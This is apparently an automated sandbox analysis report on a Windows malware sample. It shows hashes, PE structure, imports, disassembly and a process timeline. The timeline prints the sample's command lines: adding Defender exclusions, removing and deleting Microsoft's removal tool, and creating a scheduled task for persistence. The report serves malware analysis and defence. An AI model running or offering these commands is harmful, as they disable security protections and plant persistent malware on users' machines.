                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f3fmbao4.pbp.psm1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qgvcra1t.np0.psm1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_urbrehpo.yuf.ps1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\Public\Pictures_Old\AppData_Old\SppExtComObj.exe

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe
                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                    Category:modified
                                                                                    Size (bytes):706740224
                                                                                    Entropy (8bit):0.5513533060255377
                                                                                    Encrypted:false
                                                                                    SSDEEP:
                                                                                    MD5:43D7DA08F086122E16773B9002C05B1F
                                                                                    SHA1:484CD5B23793F8CD32874CC4E9291D4466A78CA4
                                                                                    SHA-256:55BC346754E52732D87752988BD73731AD5B5FC757D07F42721AE28A0D45A669
                                                                                    SHA-512:DF89E7F6D30BFE1502EA75933CEFAB49889662413EBA62249251A78B8B8A8505865A53787D887283FA218DA1D2BEFCFCF4D4F56EED3F458AF0E2DE2762FBD9EA
                                                                                    Malicious:true
                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......f..........".......!.........G ........@..........................................`..................................................e..|..............tm...............i...d......................0=..(...p..8............n..p............................text.....!.......!................. ..`.rdata.......!......!.............@..@.data...P..........................@....pdata..tm......n..................@..@.gfids.......`......."..............@..@.tls.........p.......$..............@....voltbl.*............&.................._RDATA...............(..............@..@.reloc...i.......j...*..............@..B................................................................................................................................................................................................................................................................

                                                                                    Static File Info

                                                                                    General

                                                                                    File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                    Entropy (8bit):7.998781074062823
                                                                                    TrID:
                                                                                    • Win64 Executable GUI (202006/5) 92.65%
                                                                                    • Win64 Executable (generic) (12005/4) 5.51%
                                                                                    • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                    • DOS Executable Generic (2002/1) 0.92%
                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                    File name:SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe
                                                                                    File size:30'441'984 bytes
                                                                                    MD5:330709f05491b4e01ddf2af087d4e4f3
                                                                                    SHA1:0f94e0f3f7ef87df645847f84a94572192f5fc39
                                                                                    SHA256:3fa9bb2dffef3935ed2795dace89eec65270bd22a71e365ec1f55e0bf301fab5
                                                                                    SHA512:a6711690ff220954737edc2b4d67177ca546b5a63ab3aec9ed18bfc545c81b379b3ed15c30e2abaa0d7b1ed7fc2a975468b14fc9ee57419f596a285312771170
                                                                                    SSDEEP:786432:RQ3GVQWdr9hPRfORj1ThiEKjnQ9+6P/+BGfO2rtq8qD9RMo:RQWVQW9pfORj1diE+76n+oW4q8qhRM
                                                                                    TLSH:4667330BF95284B8E026E4748669B622E7757C695B70B8EB17D18B312E2C7F1673DF00
                                                                                    File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......f.........."......x.....................@..........................................`........................................

                                                                                    File Icon

                                                                                    Icon Hash:90cececece8e8eb0

                                                                                    Static PE Info

                                                                                    General

                                                                                    Entrypoint:0x1400485a0
                                                                                    Entrypoint Section:.text
                                                                                    Digitally signed:false
                                                                                    Imagebase:0x140000000
                                                                                    Subsystem:windows gui
                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                    Time Stamp:0x66FEF42E [Thu Oct 3 19:44:46 2024 UTC]
                                                                                    TLS Callbacks:0x4002db50, 0x1
                                                                                    CLR (.Net) Version:
                                                                                    OS Version Major:6
                                                                                    OS Version Minor:0
                                                                                    File Version Major:6
                                                                                    File Version Minor:0
                                                                                    Subsystem Version Major:6
                                                                                    Subsystem Version Minor:0
                                                                                    Import Hash:1d294a89dfa5cccc79f25d6bb7b51ae4

                                                                                    Entrypoint Preview

                                                                                    Instruction
                                                                                    dec eax
                                                                                    sub esp, 28h
                                                                                    call 00007F3C08BB3C70h
                                                                                    dec eax
                                                                                    add esp, 28h
                                                                                    jmp 00007F3C08BB3887h
                                                                                    int3
                                                                                    int3
                                                                                    dec eax
                                                                                    sub esp, 28h
                                                                                    call 00007F3C08BB3A24h
                                                                                    dec eax
                                                                                    neg eax
                                                                                    sbb eax, eax
                                                                                    neg eax
                                                                                    dec eax
                                                                                    dec eax
                                                                                    add esp, 28h
                                                                                    ret
                                                                                    int3
                                                                                    inc eax
                                                                                    push ebx
                                                                                    dec eax
                                                                                    sub esp, 20h
                                                                                    dec eax
                                                                                    cmp dword ptr [01CBE426h], FFFFFFFFh
                                                                                    dec eax
                                                                                    mov ebx, ecx
                                                                                    jne 00007F3C08BB3A19h
                                                                                    call 00007F3C08BB57E5h
                                                                                    jmp 00007F3C08BB3A21h
                                                                                    dec eax
                                                                                    mov edx, ebx
                                                                                    dec eax
                                                                                    lea ecx, dword ptr [01CBE410h]
                                                                                    call 00007F3C08BB5750h
                                                                                    xor edx, edx
                                                                                    test eax, eax
                                                                                    dec eax
                                                                                    cmove edx, ebx
                                                                                    dec eax
                                                                                    mov eax, edx
                                                                                    dec eax
                                                                                    add esp, 20h
                                                                                    pop ebx
                                                                                    ret
                                                                                    int3
                                                                                    int3
                                                                                    dec eax
                                                                                    sub esp, 18h
                                                                                    dec esp
                                                                                    mov eax, ecx
                                                                                    mov eax, 00005A4Dh
                                                                                    cmp word ptr [FFFB79E5h], ax
                                                                                    jne 00007F3C08BB3A8Ah
                                                                                    dec eax
                                                                                    arpl word ptr [FFFB7A18h], cx
                                                                                    dec eax
                                                                                    lea edx, dword ptr [FFFB79D5h]
                                                                                    dec eax
                                                                                    add ecx, edx
                                                                                    cmp dword ptr [ecx], 00004550h
                                                                                    jne 00007F3C08BB3A71h
                                                                                    mov eax, 0000020Bh
                                                                                    cmp word ptr [ecx+18h], ax
                                                                                    jne 00007F3C08BB3A66h
                                                                                    dec esp
                                                                                    sub eax, edx
                                                                                    movzx eax, word ptr [ecx+14h]
                                                                                    dec eax
                                                                                    lea edx, dword ptr [ecx+18h]
                                                                                    dec eax
                                                                                    add edx, eax
                                                                                    movzx eax, word ptr [ecx+06h]
                                                                                    dec eax
                                                                                    lea ecx, dword ptr [eax+eax*4]
                                                                                    dec esp
                                                                                    lea ecx, dword ptr [edx+ecx*8]
                                                                                    dec eax
                                                                                    mov dword ptr [esp], edx
                                                                                    dec ecx
                                                                                    cmp edx, ecx
                                                                                    je 00007F3C08BB3A2Ah
                                                                                    mov ecx, dword ptr [edx+0Ch]

                                                                                    Data Directories

                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x1d02d600x118.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x1d080000x1b90.pdata
                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x1d0e0000x714.reloc
                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x1d02c500x1c.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x1d004d00x28.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1cfb8000x138.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x1d033e80x570.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                    Sections

                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                    .text0x10000x576060x57800a148eb2eada577f138089074ba679c53False0.5214313616071429data6.446985068319904IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                    .rdata0x590000x1caceac0x1cad000c05283bf5f37013c9f8c660f4159f1a5unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                    .data0x1d060000x1b800xa009430d65459707b6855176bd55563116cFalse0.144140625, Bytes/sector 320, FATs 117, root entries 152, sectors 65280 (volumes <=32 MB), Media descriptor 0xff, sectors/FAT 65535, sectors/track 1, FAT (12 bit by descriptor)1.883377243480109IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                    .pdata0x1d080000x1b900x1c00801134451f2c3d12792668ccff527ed4False0.5108816964285714data5.766895627047478IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                    .gfids0x1d0a0000x800x2000fb07c8c886b6b01886b64ea41e002aeFalse0.22265625data1.5017207702579478IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                    .tls0x1d0b0000xa10x2002b3aead56f8cd1ad5cf40bdff60fc742False0.037109375data0.020393135236084953IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                    .voltbl0x1d0c0000x2a0x200eae09b4822d39f484dfe9175c88bb635False0.107421875data0.7001115316230119
                                                                                    _RDATA0x1d0d0000xf40x20096efb7e86d989761b7ebd5296750dfbbFalse0.314453125data2.467690348409367IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                    .reloc0x1d0e0000x7140x800bffe6399af6e1c1832ce455184c13d1bFalse0.55517578125data5.202617635946286IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                    Imports

                                                                                    DLLImport
                                                                                    KERNEL32.dllAddVectoredExceptionHandler, CheckRemoteDebuggerPresent, CloseHandle, CompareStringOrdinal, CompareStringW, CreateDirectoryW, CreateFileW, CreateNamedPipeW, CreateProcessW, CreateThread, CreateWaitableTimerExW, DeleteCriticalSection, DeleteProcThreadAttributeList, DuplicateHandle, EnterCriticalSection, ExitProcess, FindClose, FindFirstFileExA, FindFirstFileW, FindNextFileA, FlushFileBuffers, FreeEnvironmentStringsW, FreeLibrary, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetComputerNameExW, GetConsoleCP, GetConsoleMode, GetCurrentProcess, GetCurrentProcessId, GetCurrentThread, GetCurrentThreadId, GetEnvironmentStringsW, GetEnvironmentVariableW, GetExitCodeProcess, GetFileAttributesW, GetFileInformationByHandle, GetFileInformationByHandleEx, GetFileType, GetFullPathNameW, GetLastError, GetModuleFileNameA, GetModuleFileNameW, GetModuleHandleA, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetProcessIoCounters, GetProcessTimes, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemDirectoryW, GetSystemInfo, GetSystemTimeAsFileTime, GetSystemTimePreciseAsFileTime, GetSystemTimes, GetTickCount64, GetWindowsDirectoryW, GlobalMemoryStatusEx, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitializeCriticalSectionAndSpinCount, InitializeProcThreadAttributeList, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, K32GetPerformanceInfo, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, LocalFree, MultiByteToWideChar, OpenProcess, QueryPerformanceCounter, QueryPerformanceFrequency, RaiseException, ReadFileEx, ReadProcessMemory, RtlCaptureContext, RtlLookupFunctionEntry, RtlUnwindEx, RtlVirtualUnwind, SetEnvironmentVariableA, SetFileInformationByHandle, SetFilePointerEx, SetLastError, SetStdHandle, SetThreadExecutionState, SetThreadStackGuarantee, SetUnhandledExceptionFilter, SetWaitableTimer, Sleep, SleepEx, SwitchToThread, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, UnhandledExceptionFilter, UpdateProcThreadAttribute, VirtualQueryEx, WaitForSingleObject, WideCharToMultiByte, WriteConsoleW, WriteFile, WriteFileEx
                                                                                    bcryptprimitives.dllProcessPrng
                                                                                    api-ms-win-core-synch-l1-2-0.dllWaitOnAddress, WakeByAddressAll, WakeByAddressSingle
                                                                                    ntdll.dllNtQueryInformationProcess, NtQuerySystemInformation, NtWriteFile, RtlGetVersion, RtlNtStatusToDosError
                                                                                    ADVAPI32.dllCopySid, GetLengthSid, GetTokenInformation, IsValidSid, OpenProcessToken, RegCloseKey, RegCreateKeyExW, RegOpenKeyExW, RegQueryValueExW, RegSetValueExW, SystemFunction036
                                                                                    bcrypt.dllBCryptGenRandom
                                                                                    powrprof.dllCallNtPowerInformation
                                                                                    ole32.dllCoCreateInstance, CoInitializeEx, CoInitializeSecurity, CoSetProxyBlanket, PropVariantClear
                                                                                    shell32.dllCommandLineToArgvW, ShellExecuteExW
                                                                                    oleaut32.dllGetErrorInfo, SafeArrayAccessData, SafeArrayDestroy, SafeArrayUnaccessData, SysAllocStringLen, SysFreeString, SysStringLen, VariantClear
                                                                                    psapi.dllGetModuleFileNameExW
                                                                                    pdh.dllPdhAddEnglishCounterW, PdhCloseQuery, PdhCollectQueryData, PdhGetFormattedCounterValue, PdhOpenQueryA, PdhRemoveCounter
                                                                                    propsys.dllPropVariantToBSTR, VariantToPropVariant

                                                                                    Network Behavior

                                                                                    No network behavior found

                                                                                    Statistics

                                                                                    CPU Usage

                                                                                    Click to jump to process

                                                                                    Memory Usage

                                                                                    Click to jump to process

                                                                                    High Level Behavior Distribution

                                                                                    Click to dive into process behavior distribution

                                                                                    Behavior

                                                                                    Click to jump to process

                                                                                    System Behavior

                                                                                    General

                                                                                    Target ID:5
                                                                                    Start time:12:13:56
                                                                                    Start date:27/10/2024
                                                                                    Path:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe"
                                                                                    Imagebase:0x7ff609900000
                                                                                    File size:30'441'984 bytes
                                                                                    MD5 hash:330709F05491B4E01DDF2AF087D4E4F3
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:12
                                                                                    Start time:12:14:59
                                                                                    Start date:27/10/2024
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"powershell.exe" -Command "Add-MpPreference -ExclusionPath @($env:ProgramData, 'C:\Users\Public') -ExclusionExtension '.exe' -Force"
                                                                                    Imagebase:0x7ff649db0000
                                                                                    File size:452'608 bytes
                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:13
                                                                                    Start time:12:14:59
                                                                                    Start date:27/10/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff77c580000
                                                                                    File size:875'008 bytes
                                                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:14
                                                                                    Start time:12:15:00
                                                                                    Start date:27/10/2024
                                                                                    Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                    Imagebase:0x7ff7ff000000
                                                                                    File size:496'640 bytes
                                                                                    MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:15
                                                                                    Start time:12:15:04
                                                                                    Start date:27/10/2024
                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"cmd.exe" /c "wusa /uninstall /kb:890830 /quiet /norestart"
                                                                                    Imagebase:0x7ff7bf9d0000
                                                                                    File size:289'792 bytes
                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:16
                                                                                    Start time:12:15:04
                                                                                    Start date:27/10/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff77c580000
                                                                                    File size:875'008 bytes
                                                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:17
                                                                                    Start time:12:15:04
                                                                                    Start date:27/10/2024
                                                                                    Path:C:\Windows\System32\wusa.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                                                    Imagebase:0x7ff773500000
                                                                                    File size:316'416 bytes
                                                                                    MD5 hash:E43499EE2B4CF328A81BACE9B1644C5D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:moderate
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:18
                                                                                    Start time:12:15:05
                                                                                    Start date:27/10/2024
                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"cmd.exe" /c "del /f /q %SystemRoot%\System32\MRT.exe"
                                                                                    Imagebase:0x7ff7bf9d0000
                                                                                    File size:289'792 bytes
                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:19
                                                                                    Start time:12:15:05
                                                                                    Start date:27/10/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff77c580000
                                                                                    File size:875'008 bytes
                                                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:20
                                                                                    Start time:12:15:05
                                                                                    Start date:27/10/2024
                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"cmd.exe" /c "reg add HKLM\SOFTWARE\Policies\Microsoft\MRT /v DontOfferThroughWUAU /t REG_DWORD /d 1 /f"
                                                                                    Imagebase:0x7ff7bf9d0000
                                                                                    File size:289'792 bytes
                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:21
                                                                                    Start time:12:15:05
                                                                                    Start date:27/10/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff77c580000
                                                                                    File size:875'008 bytes
                                                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:22
                                                                                    Start time:12:15:05
                                                                                    Start date:27/10/2024
                                                                                    Path:C:\Windows\System32\reg.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:reg add HKLM\SOFTWARE\Policies\Microsoft\MRT /v DontOfferThroughWUAU /t REG_DWORD /d 1 /f
                                                                                    Imagebase:0x7ff7a3220000
                                                                                    File size:77'312 bytes
                                                                                    MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:23
                                                                                    Start time:12:15:36
                                                                                    Start date:27/10/2024
                                                                                    Path:C:\Users\Public\Pictures_Old\AppData_Old\SppExtComObj.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Users\Public\Pictures_Old\AppData_Old\SppExtComObj.exe"
                                                                                    Imagebase:0x7ff684a80000
                                                                                    File size:706'740'224 bytes
                                                                                    MD5 hash:43D7DA08F086122E16773B9002C05B1F
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:24
                                                                                    Start time:12:15:42
                                                                                    Start date:27/10/2024
                                                                                    Path:C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe"
                                                                                    Imagebase:0x7ff6d9cf0000
                                                                                    File size:706'740'224 bytes
                                                                                    MD5 hash:B22A88CB0DDC70FA01E392173505458C
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:25
                                                                                    Start time:12:15:52
                                                                                    Start date:27/10/2024
                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"cmd.exe" /c "schtasks /Create /TR C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe /SC ONLOGON /TN TMPSYSUPD /F /RL highest"
                                                                                    Imagebase:0x7ff7bf9d0000
                                                                                    File size:289'792 bytes
                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:26
                                                                                    Start time:12:15:52
                                                                                    Start date:27/10/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff77c580000
                                                                                    File size:875'008 bytes
                                                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:27
                                                                                    Start time:12:15:52
                                                                                    Start date:27/10/2024
                                                                                    Path:C:\Windows\System32\schtasks.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:schtasks /Create /TR C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe /SC ONLOGON /TN TMPSYSUPD /F /RL highest
                                                                                    Imagebase:0x7ff752230000
                                                                                    File size:235'008 bytes
                                                                                    MD5 hash:796B784E98008854C27F4B18D287BA30
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Disassembly

                                                                                    Reset < >

                                                                                      Executed Functions

                                                                                      Function 00007FF8490639D1 Relevance: 6.6, Strings: 4, Instructions: 1568COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.1971990635.00007FF849060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849060000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_7ff849060000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 8>*I$8>*I$p>*I$p>*I
                                                                                      • API String ID: 0-800015961
                                                                                      • Opcode ID: 3d72eb99f8a5273db3e455b8f8f20711e1fdf2f3bcdbaf5c7c31c987d3442375
                                                                                      • Instruction ID: f20b25f71b12f75b53b8b0fcac037670822b7ad50676efd7103a175338fe35f4
                                                                                      • Opcode Fuzzy Hash: 3d72eb99f8a5273db3e455b8f8f20711e1fdf2f3bcdbaf5c7c31c987d3442375
                                                                                      • Instruction Fuzzy Hash: 0DA2E532E0EBC94FEBA6EB2858555B53BE1EF56650B0901FBD08DC71D3DA18EC068391
                                                                                      Function 00007FF849066605 Relevance: 6.7, Strings: 5, Instructions: 438COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
